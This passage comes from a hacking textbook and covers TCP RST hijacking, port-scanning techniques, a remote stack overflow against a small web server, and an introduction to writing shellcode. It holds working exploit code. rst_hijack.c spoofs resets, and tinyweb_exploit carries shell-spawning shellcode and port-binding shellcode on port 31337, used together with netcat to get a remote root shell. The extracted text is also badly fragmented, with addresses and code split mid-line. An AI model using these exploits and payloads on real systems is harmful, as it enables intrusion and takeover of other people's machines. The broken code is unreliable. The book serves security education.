Packet Filter (BPF), is very similar to a program
...
168
...
88 is "dst host 192
...
42
...
Like
a program, this rule consists of keyword and must be compiled before it’s
actually sent to the kernel
...

reader@hacking:~/booksrc $ sudo tcpdump -d "dst host 192
...
42
...
168
...
88"
10
40 0 0 12
21 0 2 2048
32 0 0 30
21 4 5 3232246360
21 1 0 2054
21 0 3 32821
32 0 0 38
21 0 1 3232246360
6 0 0 96
6 0 0 0
reader@hacking:~/booksrc $

After the filter rule is compiled, it can be passed to the kernel for filtering
...
All
established connections will have the ACK flag set, so this is what we should
look for
...
The
N et wor kin g

259

flags are found in the following order, from left to right: URG, ACK, PSH,
RST, SYN, and FIN
...
If both SYN and
ACK are turned on, the 13th octet would be 00010010 in binary, which is 18
in decimal
...

ANDing 00010010 with 00010000 will produce 00010000, since the ACK bit is the
only bit where both bits are 1
...

This filter rule can be rewritten using named values and inverted logic as
tcp[tcpflags] & tcp-ack != 0
...
This rule can be combined with the previous destination IP rule using
and logic; the full rule is shown below
...
168
...
88"
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes
10:19:47
...
168
...
72
...
168
...
88
...
ack 2777534975 win 92

10:19:47
...
168
...
72
...
168
...
88
...
ack 22 win 92 85838621 29399>
10:19:47
...
168
...
72
...
168
...
88
...
771536 IP 192
...
42
...
40238 > 192
...
42
...
22: P 20:732(712) ack 766 win 115

10:19:47
...
168
...
72
...
168
...
88
...
When the program gets a packet, the header information is
used to spoof a RST packet
...

rst_hijack
...
h>
#include ...
h"
void caught_packet(u_char *, const struct pcap_pkthdr *, const u_char *);
int set_packet_filter(pcap_t *, struct in_addr *);
struct data_pass {
int libnet_handle;
u_char *packet;
};
int main(int argc, char *argv[]) {
struct pcap_pkthdr cap_header;
const u_char *packet, *pkt_data;
pcap_t *pcap_handle;

260

0x 400

char errbuf[PCAP_ERRBUF_SIZE]; // Same size as LIBNET_ERRBUF_SIZE
char *device;
u_long target_ip;
int network;
struct data_pass critical_libnet_data;
if(argc < 1) {
printf("Usage: %s \n", argv[0]);
exit(0);
}
target_ip = libnet_name_resolve(argv[1], LIBNET_RESOLVE);
if (target_ip == -1)
fatal("Invalid target address");
device = pcap_lookupdev(errbuf);
if(device == NULL)
fatal(errbuf);
pcap_handle = pcap_open_live(device, 128, 1, 0, errbuf);
if(pcap_handle == NULL)
fatal(errbuf);
critical_libnet_data
...
libnet_handle == -1)
libnet_error(LIBNET_ERR_FATAL, "can't open network interface
...
\n");
libnet_init_packet(LIBNET_IP_H + LIBNET_TCP_H, &(critical_libnet_data
...
packet == NULL)
libnet_error(LIBNET_ERR_FATAL, "can't initialize packet memory
...
In the beginning,
a data_pass structure is defined, which is used to pass data through the libpcap
callback
...
The file descriptor for the raw socket and a pointer to the packet
memory will be needed in the callback function, so this critical libnet data is
stored in its own structure
...
By passing a pointer
to the critical_libnet_data structure, the callback function will have access to
everything in this structure
...

N et wor kin g

261

/* Sets a packet filter to look for established TCP connections to target_ip */
int set_packet_filter(pcap_t *pcap_hdl, struct in_addr *target_ip) {
struct bpf_program filter;
char filter_string[100];
sprintf(filter_string, "tcp[tcpflags] & tcp-ack != 0 and dst host %s", inet_ntoa(*target_ip));
printf("DEBUG: filter string is \'%s\'\n", filter_string);
if(pcap_compile(pcap_hdl, &filter, filter_string, 0, 0) == -1)
fatal("pcap_compile failed");
if(pcap_setfilter(pcap_hdl, &filter) == -1)
fatal("pcap_setfilter failed");
}

The next function compiles and sets the BPF to only accept packets from
established connections to the target IP
...

void caught_packet(u_char *user_args, const struct pcap_pkthdr *cap_header, const u_char
*packet) {
u_char *pkt_data;
struct libnet_ip_hdr *IPhdr;
struct libnet_tcp_hdr *TCPhdr;
struct data_pass *passed;
int bcount;
passed = (struct data_pass *) user_args; // Pass data using a pointer to a struct
...
");
usleep(5000); // pause slightly
}

The callback function spoofs the RST packets
...
We could use our own structures from hacking-network
...
The spoofed RST packet uses the sniffed source address as
the destination, and vice versa
...

reader@hacking:~/booksrc $ gcc $(libnet-config --defines) -o rst_hijack rst_hijack
...
/rst_hijack 192
...
42
...
168
...
88'
Resetting all TCP connections to 192
...
42
...
168
...
72:47783 <---> 192
...
42
...
This attack becomes
more interesting when the spoof packet contains data
...
Since the victim’s machine doesn’t know about the spoofed
packet, the host machine’s response has an incorrect sequence number, so
the victim ignores that response packet
...
Therefore, any packet the victim tries to send to the host machine
will have an incorrect sequence number as well, causing the host machine
to ignore it
...
And since
the attacker sent out the first spoofed packet that caused all this chaos, it can
keep track of sequence numbers and continue spoofing packets from the
victim’s IP address to the host machine
...

N et wor kin g

263

0x470

Port Scanning
Port scanning is a way of figuring out which ports are listening and accepting
connections
...
The simplest form of port scanning involves trying to open TCP connections to every
possible port on the target system
...
Also, when connections are established, services will normally log
the IP address
...

A port scanning tool called nmap, written by Fyodor, implements all of
the following port-scanning techniques
...

0x471 Stealth SYN Scan
A SYN scan is also sometimes called a half-open scan
...
Recall the TCP/IP handshake: When a
full connection is made, first a SYN packet is sent, then a SYN/ACK packet is
sent back, and finally an ACK packet is returned to complete the handshake
and open the connection
...
Instead, only the initial SYN packet is sent,
and the response is examined
...
This is recorded, and an RST packet
is sent to tear down the connection to prevent the service from accidentally
being DoSed
...
The program must be run as root, since the program isn’t using
standard sockets and needs raw network access
...
168
...
72
Starting Nmap 4
...
org ) at 2007-05-29 09:19 PDT
Interesting ports on 192
...
42
...
094 seconds

0x472 FIN, X-mas, and Null Scans
In response to SYN scanning, new tools to detect and log half-open connections
were created
...
These all involve sending a nonsensical
packet to every port on the target system
...
However, if the port is closed and the implementation follows
protocol (RFC 793), an RST packet will be sent
...

The FIN scan sends a FIN packet, the X-mas scan sends a packet with
FIN, URG, and PUSH turned on (so named because the flags are lit up like a
264

0x 400

Christmas tree), and the Null scan sends a packet with no TCP flags set
...
For instance,
Microsoft’s implementation of TCP doesn’t send RST packets like it should,
making this form of scanning ineffective
...
Their output looks
basically the same as the previous scan
...
This technique
simply spoofs connections from various decoy IP addresses in between each
real port-scanning connection
...
However, the spoofed decoy
addresses must use real IP addresses of live hosts; otherwise, the target may
be accidentally SYN flooded
...

The sample nmap command shown below scans the IP 192
...
42
...
168
...
10 and 192
...
42
...

reader@hacking:~/booksrc $ sudo nmap -D 192
...
42
...
168
...
11 192
...
42
...
The attacker needs to find a
usable idle host that is not sending or receiving any other network traffic and
that has a TCP implementation that produces predictable IP IDs that change
by a known increment with each packet
...

Predictable IP IDs have never really been considered a security risk, and idle
scanning takes advantage of this misconception
...

First, the attacker gets the current IP ID of the idle host by contacting it
with a SYN packet or an unsolicited SYN/ACK packet and observing the IP
ID of the response
...

Then, the attacker sends a spoofed SYN packet with the idle host’s IP
address to a port on the target machine
...
But since the idle host didn’t actually send out the initial SYN
packet, this response appears to be unsolicited to the idle host, and it
responds by sending back an RST packet
...

N et wor kin g

265

At this point, the attacker contacts the idle host again to determine how
much the IP ID has incremented
...
This
implies that the port on the target machine is closed
...
This implies that the port on the
target machine is open
...

Of course, if the idle host isn’t truly idle, the results will be skewed
...
If 20 packets are sent, then a change of 20 incremental steps should be
an indication of an open port, and none, of a closed port
...

If this technique is used properly on an idle host that doesn’t have any
logging capabilities, the attacker can scan any target without ever revealing
his or her IP address
...
com 192
...
42
...
Knowing what ports are open allows an attacker to determine which services can
be attacked
...
While writing this chapter, I wondered
if it is possible to prevent port scans before they actually happen
...

First of all, the FIN, Null, and X-mas scans can be prevented by a simple
kernel modification
...
The following output uses grep to find the kernel code
responsible for sending reset packets
...
*send_reset" /usr/src/linux/net/ipv4/tcp_ipv4
...
th;
550struct {
551struct tcphdr th;
552-#ifdef CONFIG_TCP_MD5SIG
553__be32 opt[(TCPOLEN_MD5SIG_ALIGNED >> 2)];
554-#endif
555} rep;
556struct ip_reply_arg arg;
557-#ifdef CONFIG_TCP_MD5SIG
558struct tcp_md5sig_key *key;
559-#endif
560return; // Modification: Never send RST, always return
...
*/
562if (th->rst)
563return;
564565if (((struct rtable *)skb->dst)->rt_type != RTN_LOCAL)
566return;
567reader@hacking:~/booksrc $

By adding the return command (shown above in bold), the
tcp_v4_send_reset() kernel function will simply return instead of doing
anything
...

FIN Scan Before the Kernel Modification
matrix@euclid:~ $ sudo nmap -T5 -sF 192
...
42
...
11 ( http://www
...
org/nmap/ ) at 2007-03-17 16:58 PDT
Interesting ports on 192
...
42
...
462 seconds
matrix@euclid:~ $

FIN Scan After the Kernel Modification
matrix@euclid:~ $ sudo nmap -T5 -sF 192
...
42
...
11 ( http://www
...
org/nmap/ ) at 2007-03-17 16:58 PDT
Interesting ports on 192
...
42
...
462 seconds
matrix@euclid:~ $

This works fine for scans that rely on RST packets, but preventing information leakage with SYN scans and full-connect scans is a bit more difficult
...
But if all of the closed ports also
responded with SYN/ACK packets, the amount of useful information an
attacker could retrieve from port scans would be minimized
...

Ideally, this should all be done without using a TCP stack
...
It’s a modification of the rst_hijack
...

The callback function spoofs a legitimate looking SYN/ACK response to any
SYN packet that makes it through the BPF
...

shroud
...
h>
#include ...
h"
#define MAX_EXISTING_PORTS 30
void caught_packet(u_char *, const struct pcap_pkthdr *, const u_char *);
int set_packet_filter(pcap_t *, struct in_addr *, u_short *);
struct data_pass {
int libnet_handle;
u_char *packet;
};
int main(int argc, char *argv[]) {
struct pcap_pkthdr cap_header;
const u_char *packet, *pkt_data;
pcap_t *pcap_handle;

268

0x 400

char errbuf[PCAP_ERRBUF_SIZE]; // Same size as LIBNET_ERRBUF_SIZE
char *device;
u_long target_ip;
int network, i;
struct data_pass critical_libnet_data;
u_short existing_ports[MAX_EXISTING_PORTS];
if((argc < 2) || (argc > MAX_EXISTING_PORTS+2)) {
if(argc > 2)
printf("Limited to tracking %d existing ports
...
]\n", argv[0]);
exit(0);
}
target_ip = libnet_name_resolve(argv[1], LIBNET_RESOLVE);
if (target_ip == -1)
fatal("Invalid target address");
for(i=2; i < argc; i++)
existing_ports[i-2] = (u_short) atoi(argv[i]);
existing_ports[argc-2] = 0;
device = pcap_lookupdev(errbuf);
if(device == NULL)
fatal(errbuf);
pcap_handle = pcap_open_live(device, 128, 1, 0, errbuf);
if(pcap_handle == NULL)
fatal(errbuf);
critical_libnet_data
...
libnet_handle == -1)
libnet_error(LIBNET_ERR_FATAL, "can't open network interface
...
\n");
libnet_init_packet(LIBNET_IP_H + LIBNET_TCP_H, &(critical_libnet_data
...
packet == NULL)
libnet_error(LIBNET_ERR_FATAL, "can't initialize packet memory
...
");
printf("bing!\n");
}

There are a few tricky parts in the code above, but you should be able to
follow all of it
...

reader@hacking:~/booksrc $ gcc $(libnet-config --defines) -o shroud shroud
...
/shroud 192
...
42
...
168
...
72 and tcp[tcpflags] & tcp-syn != 0 and
tcp[tcpflags] & tcp-ack = 0 and not (dst port 22 or dst port 80)'

While shroud is running, any port scanning attempts will show every port
to be open
...
168
...
189
Starting nmap V
...
00 ( www
...
org/nmap/ )
Interesting ports on (192
...
0
...
A dedicated attacker could simply telnet to every
port to check the banners, but this technique could easily be expanded to
spoof banners also
...
You’ve seen for yourself how crazy some of the typecasts
can get
...
And since many network programs need to run as root, these little mistakes can become critical vulnerabilities
...
Did you
notice it?
From hacking-network
...
It will receive from the socket until the EOL byte
* sequence in seen
...

* Returns the size of the read line (without EOL bytes)
...

if(*ptr == EOL[eol_matched]) { // Does this byte match terminator?
eol_matched++;
if(eol_matched == EOL_SIZE) { // If all bytes match terminator,
*(ptr+1-EOL_SIZE) = '\0'; // terminate the string
...

}
} else {
eol_matched = 0;
}
ptr++; // Increment the pointer to the next byte
...

}

The recv_line() function in hacking-network
...
This means received bytes
can overflow if they exceed the dest_buffer size
...

0x481 Analysis with GDB
To exploit the vulnerability in the tinyweb
...
First, we need to
know the offset from the start of a buffer we control to the stored return
address
...
For
example, the program requires root privileges, so the debugger must be run
as root
...
There are other slight
differences that can shift memory around in the debugger like this, creating
inconsistencies that can be maddening to track down
...

One elegant solution to this problem is to attach to the process after it’s
already running
...
The source is
recompiled using the -g option to include debugging symbols that GDB
can apply to the running process
...
0 0
...
/tinyweb
reader 13104 0
...
0
2880
748 pts/2
R+
20:27 0:00 grep tinyweb
reader@hacking:~/booksrc $ gcc -g tinyweb
...
/a
...
so
...

Attaching to process 13019
/cow/home/reader/booksrc/tinyweb: No such file or directory
...
Kill it? (y or n) n
Program not killed
...
c:44
(gdb) list 44
39
if (listen(sockfd, 20) == -1)
40
fatal("listening on socket");
41
42
while(1) {
// Accept loop
43
sin_size = sizeof(struct sockaddr_in);
44
new_sockfd = accept(sockfd, (struct sockaddr *)&client_addr, &sin_size);
45
if(new_sockfd == -1)
46
fatal("accepting connection");
47
48
handle_connection(new_sockfd, &client_addr);
(gdb) list handle_connection
53
/* This function handles the connection on the passed socket from the
54
* passed client address
...
Finally, the
56
* passed socket is closed at the end of the function
...
c, line 62
...

After attaching to the running process, a stack backtrace shows the program is currenty in main(), waiting for a connection
...

At this point, the program’s execution must be advanced by making a web
request using wget in another terminal or a browser
...

Breakpoint 2, handle_connection (sockfd=4, client_addr_ptr=0xbffff810) at tinyweb
...
c:62
#1 0x08048cf6 in main () at tinyweb
...
Quit anyway (and detach it)? (y or n) y
Detaching from program: , process 13019
reader@hacking:~/booksrc $

At the breakpoint, the request buffer begins at 0xbfffff5c0
...
Since we know how the local variables are generally laid out on
the stack, we know the request buffer is near the end of the frame
...
Since we already know the general area to look, a
quick inspection shows the stored return address is at 0xbffff7dc ( )
...
However, there are a few bytes near the beginning of the buffer that
might be mangled by the rest of the function
...
To account for this, it’s
best to just avoid the beginning of the buffer
...
This means 0xbffff688 is the target return address
...
It fills the exploit buffer with
null bytes, so anything written into it will automatically be null-terminated
...
This builds the NOP
sled and fills the buffer up to the return address overwrite location
...

tinyweb_exploit
...
h>
...
h>
...
h>
...
h>

#include "hacking
...
h"
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80"; // Standard shellcode
#define OFFSET 540
N et wor kin g

275

#define RETADDR 0xbffff688
int main(int argc, char *argv[]) {
int sockfd, buflen;
struct hostent *host_info;
struct sockaddr_in target_addr;
unsigned char buffer[600];
if(argc < 2) {
printf("Usage: %s \n", argv[0]);
exit(1);
}
if((host_info = gethostbyname(argv[1])) == NULL)
fatal("looking up hostname");
if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1)
fatal("in socket");
target_addr
...
sin_port = htons(80);
target_addr
...
sin_zero), '\0', 8); // Zero the rest of the struct
...

memset(buffer, '\x90', OFFSET);
// Build a NOP sled
...

strcat(buffer, "\r\n");
// Terminate the string
...

send_string(sockfd, buffer); // Send exploit buffer as an HTTP request
...
The exploit
also dumps out the bytes of the exploit buffer before it sends it
...
Here’s the output from the attacker’s terminal:
reader@hacking:~/booksrc $
reader@hacking:~/booksrc $
Exploit buffer:
90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90

276

0x 400

gcc tinyweb_exploit
...
/a
...
0
...
1
90
90
90
90
90
90

90
90
90
90
90
90

90
90
90
90
90
90

90
90
90
90
90
90

90
90
90
90
90
90

90
90
90
90
90
90

90
90
90
90
90
90

|
|
|
|
|
|

...

...

...

90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90
31 c9 99 b0 a4 cd 80 6a 0b
68 2f 62 69 6e 89 e3 51 89
90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90
0d 0a
reader@hacking:~/booksrc $

90
90
90
90
90
90
90
90
90
90
90
90
90
58
e2
90
90
90
90
90
90
90
90
90
90
90
90
90

90
90
90
90
90
90
90
90
90
90
90
90
90
51
53
90
90
90
90
90
90
90
90
90
90
90
90
90

90
90
90
90
90
90
90
90
90
90
90
90
90
68
89
90
90
90
90
90
90
90
90
90
90
90
90
90

90
90
90
90
90
90
90
90
90
90
90
90
31
2f
e1
90
90
90
90
90
90
90
90
90
90
90
90
88

90
90
90
90
90
90
90
90
90
90
90
90
c0
2f
cd
90
90
90
90
90
90
90
90
90
90
90
90
f6

90
90
90
90
90
90
90
90
90
90
90
90
31
73
80
90
90
90
90
90
90
90
90
90
90
90
90
ff

90
90
90
90
90
90
90
90
90
90
90
90
db
68
90
90
90
90
90
90
90
90
90
90
90
90
90
bf

|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|

...

...

...

...

...

...

...
1
...
j
...
Q
...

...

...

...

...

...

...

...

Back on the terminal running the tinyweb program, the output shows the
exploit buffer was received and the shellcode is executed
...
Unfortunately, we aren’t
at the console, so this won’t do us any good
...
/tinyweb
Accepting web requests on port 80
Got request from 127
...
0
...
1"
Opening '
...
html'
200 OK
Got request from 127
...
0
...
jpg HTTP/1
...
/webroot/image
...
0
...
1:58504
"
1 1 1

j
XQh//shh/bin

Q

S
"

NOT HTTP!
sh-3
...
Since we’re not at the console, shellcode is just a selfcontained program, designed to take over another program to open a shell
...
There are many different types of shellcode
that can be used in different situations (or payloads)
...

0x483 Port-Binding Shellcode
When exploiting a remote program, spawning a shell locally is pointless
...
Assuming you already have port-binding
shellcode ready, using it is simply a matter of replacing the shellcode bytes
defined in the exploit
...
These shellcode bytes are shown in the output below
...
1
...
j
...
jfXCRfhzifS
...
|
00000020 51 56 89 e1 cd 80 b0 66 43 43 53 56 89 e1 cd 80 |QV
...
|
00000030 b0 66 43 52 52 56 89 e1 cd 80 93 6a 02 59 b0 3f |
...
j
...
?|
00000040 cd 80 49 79 f9 b0 0b 52 68 2f 2f 73 68 68 2f 62 |
...
Rh//shh/b|
00000050 69 6e 89 e3 52 89 e2 53 89 e1 cd 80
|in
...
S
...
c program, resulting in tinyweb_exploit2
...
The
new shellcode line is shown below
...
c
char shellcode[]=
"\x6a\x66\x58\x99\x31\xdb\x43\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80"
"\x96\x6a\x66\x58\x43\x52\x66\x68\x7a\x69\x66\x53\x89\xe1\x6a\x10"
"\x51\x56\x89\xe1\xcd\x80\xb0\x66\x43\x43\x53\x56\x89\xe1\xcd\x80"
"\xb0\x66\x43\x52\x52\x56\x89\xe1\xcd\x80\x93\x6a\x02\x59\xb0\x3f"
"\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80";
// Port-binding shellcode on port 31337

278

0x 400

When this exploit is compiled and run against a host running tinyweb
server, the shellcode listens on port 31337 for a TCP connection
...
This program is netcat (nc for short), which works like that cat program but over the
network
...
The output of this exploit is shown below
...

reader@hacking:~/booksrc $ gcc tinyweb_exploit2
...
/a
...
0
...
1
Exploit buffer:
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 6a 66 58 99 |
...

31 db 43 52 6a 01 6a 02 89 e1 cd 80 96 6a 66 58 | 1
...
j
...
j
...

cd 80 b0 66 43 43 53 56 89 e1 cd 80 b0 66 43 52 |
...
fCR
52 56 89 e1 cd 80 93 6a 02 59 b0 3f cd 80 49 79 | RV
...
Y
...
Rh//shh/bin
...
S
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

0d 0a
|
...
0
...
1 31337
localhost [127
...
0
...

A program like netcat can be used for many other things
...
Using netcat and the port-binding shellcode in a file, the same
exploit can be carried out on the command line
...
\r\n"')

jfX 1 CRj j
RfhzifS

j QV

fCCSV

fCRRV

jfXC

j Y ? Iy
Rh//shh/bin

R

S

reader@hacking:~/booksrc $ (perl -e 'print "\x90"x300'; cat portbinding_shellcode;
perl -e 'print "\x88\xf6\xff\xbf"x38
...
0
...
1 80
localhost [127
...
0
...
0
...
1 31337
localhost [127
...
0
...
The return address is found 540 bytes from the start of
the buffer, so with a 300-byte NOP sled and 92 bytes of shellcode, there are
152 bytes to the return address overwrite
...
Finally, the buffer is terminated with '\r\n'
...
netcat connects to the tinyweb program and sends the buffer
...
Then, netcat is used again
to connect to the shell bound on port 31337
...
We have seen
standard shell-spawning shellcode for local exploits
and port-binding shellcode for remote ones
...
Shellcode usually
spawns a shell, as that is an elegant way to hand off control; but it can do anything a program can do
...
These hackers are just scratching the surface of what’s possible
...

Perhaps you want your shellcode to add an admin account to /etc/passwd
or to automatically remove lines from log files
...
In
addition, writing shellcode develops assembly language skills and employs a
number of hacking techniques worth knowing
...
C
The shellcode bytes are actually architecture-specific machine instructions,
so shellcode is written using the assembly language
...

The operating system manages things like input, output, process control, file
access, and network communication in the kernel
...
Different
operating systems have different sets of system calls
...
A C program that uses printf() to output a string can be compiled for many different
systems, since the library knows the appropriate system calls for various architectures
...

By definition, assembly language is already specific to a certain processor
architecture, so portability is impossible
...
To begin our comparison,
let’s write a simple C program, then rewrite it in x86 assembly
...
c
#include ...
The strace program is used to trace a program’s system calls
...

reader@hacking:~/booksrc $ gcc helloworld
...
/a
...
/a
...
/a
...
so
...
so
...
so
...
}) = 0
mmap2(NULL, 61323, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7ee7000
close(3)
= 0
access("/etc/ld
...
nohwcap", F_OK)
= -1 ENOENT (No such file or directory)
open("/lib/tls/i686/cmov/libc
...
6", O_RDONLY) = 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20Z\1\000"
...
}) = 0
mmap2(NULL, 1258876, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb7db3000
mmap2(0xb7ee0000, 16384, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x12c) =
0xb7ee0000

282

0x 500

mmap2(0xb7ee4000, 9596, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) =
0xb7ee4000
close(3)
= 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7db2000
set_thread_area({entry_number:-1 -> 6, base_addr:0xb7db26b0, limit:1048575, seg_32bit:1,
contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
mprotect(0xb7ee0000, 8192, PROT_READ)
= 0
munmap(0xb7ee7000, 61323)
= 0
fstat64(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 2),
...

The system calls at the start are setting up the environment and memory
for the program, but the important part is the write() syscall shown in bold
...

The Unix manual pages (accessed with the man command) are separated into sections
...
h>
ssize_t write(int fd, const void *buf, size_t count);
DESCRIPTION
write() writes up to count bytes to the file referenced by the file
descriptor fd from the buffer starting at buf
...
Note that not all file systems are POSIX conforming
...
The buf
and count arguments are a pointer to our string and its length
...
File descriptors are used
for almost everything in Unix: input, output, file access, network sockets,
and so on
...

Opening a file descriptor is like checking in your coat, since you are given
a number that can later be used to reference your coat
...
These values are standard and have been defined in several
places, such as the /usr/include/unistd
...

Sh el lc ode

283

From /usr/include/unistd
...
*/
#define STDIN_FILENO 0 /* Standard input
...
*/
#define STDERR_FILENO 2 /* Standard error output
...
The standard
error file descriptor of 2 is used to display the error or debugging messages
that can be filtered from the standard output
...
These syscalls are listed in
/usr/include/asm-i386/unistd
...

From /usr/include/asm-i386/unistd
...

*/
#define
#define
#define
#define
#define
#define
#define
#define
#define
#define
#define
#define
#define
#define
#define
#define
#define
#define
#define
#define
#define
#define
#define
#define
#define

284

0x 500

__NR_restart_syscall
__NR_exit
1
__NR_fork
2
__NR_read
3
__NR_write
4
__NR_open
5
__NR_close
6
__NR_waitpid
7
__NR_creat
8
__NR_link
9
__NR_unlink
10
__NR_execve
11
__NR_chdir
12
__NR_time
13
__NR_mknod
14
__NR_chmod
15
__NR_lchown
16
__NR_break
17
__NR_oldstat
18
__NR_lseek
19
__NR_getpid
20
__NR_mount
21
__NR_umount
22
__NR_setuid
23
__NR_getuid
24

0

#define
#define
#define
#define
#define
#define
#define
#define
#define
#define
#define
#define
#define
#define
#define

...
c in assembly, we will make a system call to
the write() function for the output and then a second system call to exit()
so the process quits cleanly
...

Assembly instructions for the x86 processor have one, two, three, or no
operands
...
The x86 processor has several 32-bit registers
that can be viewed as hardware variables
...

The mov instruction copies a value between its two operands
...
The int instruction sends an interrupt signal to the kernel, defined
by its single operand
...
When the int 0x80 instruction is executed, the
kernel will make a system call based on the first four registers
...
All of these registers can be set using the mov instruction
...
The string "Hello, world!" with a newline character (0x0a) is in the
data segment, and the actual assembly instructions are in the text segment
...

helloworld
...
data
msg
db
section
...

Put 1 into ebx, since stdout is 1
...

Put 14 into edx, since our string is 14 bytes
...

; SYSCALL: exit(0)
mov eax, 1
; Put 1 into eax, since exit is syscall #1
...

int 0x80
; Do the syscall
...
For the write() syscall
to standard output, the value of 4 is put in EAX since the write() function is
system call number 4
...
Next, the
address of the string in the data segment is put into ECX, and the length of the
string (in this case, 14 bytes) is put into EDX
...

To exit cleanly, the exit() function needs to be called with a single
argument of 0
...
Then the system call interrupt is triggered again
...
When compiling C code, the GCC
compiler takes care of all of this automatically
...

The nasm assembler with the -f elf argument will assemble the
helloworld
...

By default, this object file will be called helloworld
...
The linker program
ld will produce an executable a
...

reader@hacking:~/booksrc
reader@hacking:~/booksrc
reader@hacking:~/booksrc
Hello, world!
reader@hacking:~/booksrc

$ nasm -f elf helloworld
...
o
$
...
out
$

This tiny program works, but it’s not shellcode, since it isn’t self-contained
and must be linked
...
Since shellcode isn’t really an executable program, we don’t have the luxury of declaring the layout of data in memory or
even using other memory segments
...

This is commonly referred to as position-independent code
...
This is fine as long as EIP doesn’t
try to interpret the string as instructions
...
When the shellcode gets executed, it could be anywhere in memory
...
Since EIP cannot be accessed from assembly instructions,
however, we need to use some sort of trick
...

Instruction

Description

push

Push the source operand to the stack
...

call

Call a function, jumping the execution to the address in the location
operand
...
The address of the
instruction following the call is pushed to the stack, so that execution can
return later
...

Stack-based exploits are made possible by the call and ret instructions
...
After the function is finished, the ret
instruction pops the return address from the stack and jumps EIP back there
...

This architecture can be misused in another way to solve the problem of
addressing the inline string data
...
Instead of calling a function, we can jump past the string to a pop
instruction that will take the address off the stack and into a register
...

helloworld1
...

call mark_below
; Call below the string to instructions
db "Hello, world!", 0x0a, 0x0d ; with newline and carriage return bytes
...

; Write syscall #
...
This also
pushes the address of the next instruction to the stack, the next instruction
in our case being the beginning of the string
...
Without using
any memory segments, these raw instructions, injected into an existing process,
will execute in a completely position-independent way
...

reader@hacking:~/booksrc $ nasm helloworld1
...
Hello, worl|
|d!
...
|
|
...
|

The nasm assembler converts assembly language into machine code and
a corresponding tool called ndisasm converts machine code into assembly
...
The disassembly instructions marked
in bold are the bytes of the "Hello, world!" string interpreted as instructions
...

288

0x 500

reader@hacking:~/booksrc $ export SHELLCODE=$(cat helloworld1)
reader@hacking:~/booksrc $
...
/notesearch
SHELLCODE will be at 0xbffff9c6
reader@hacking:~/booksrc $
...
Why do you think it crashed? In situations like this, GDB is your
best friend
...

0x522 Investigating with GDB
Since the notesearch program runs as root, we can’t debug it as a normal
user
...
Another way to debug programs is with core dumps
...
This means that dumped core
files are allowed to get as big as needed
...

reader@hacking:~/booksrc $ sudo su
root@hacking:/home/reader/booksrc # ulimit -c unlimited
root@hacking:/home/reader/booksrc # export SHELLCODE=$(cat helloworld1)
root@hacking:/home/reader/booksrc #
...
/notesearch
SHELLCODE will be at 0xbffff9a3
root@hacking:/home/reader/booksrc #
...
/core
-rw------- 1 root root 147456 2007-10-26 08:36
...
/core
(no debugging symbols found)
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db
...
1"
...
/notesearch
£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E
...

